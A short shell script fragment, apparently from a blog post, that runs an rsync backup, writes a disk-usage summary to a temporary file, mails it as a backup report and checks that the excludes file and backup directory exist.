# our actual rsyncing function
do_rsync()
{
   rsync $OPTIONS $BACKUPDIR $ARCHIVEROOT/$CURRENT
}

# our post rsync accounting function
do_accounting()
{
   echo "Backup Accounting for Day $INCREMENTDIR on $HOSTNAME:">/tmp/rsync_script_tmpfile
   echo >> /tmp/rsync_script_tmpfile
   echo "################################################">>/tmp/rsync_script_tmpfile
   du -s $ARCHIVEROOT/* >> /tmp/rsync_script_tmpfile
   echo "Mail $MAILADDR -s $HOSTNAME Backup Report < /tmp/rsync_script_tmpfile"
   Mail $MAILADDR -s $HOSTNAME Backup Report < /tmp/rsync_script_tmpfile
   echo "rm /tmp/rsync_script_tmpfile"
   rm /tmp/rsync_script_tmpfile
}

# some error handling and/or run our backup and accounting
if [ -f $EXCLUDES ]; then
    if [ -d $BACKUPDIR ]; then
        # now the actual transfer
        do_rsync && do_accounting
    else
        echo "cant find $BACKUPDIR"; exit
    fi
    else
        echo "cant find $EXCLUDES"; exit
fi

Tagged with:
Previous Entries Next Entries
preload preload preload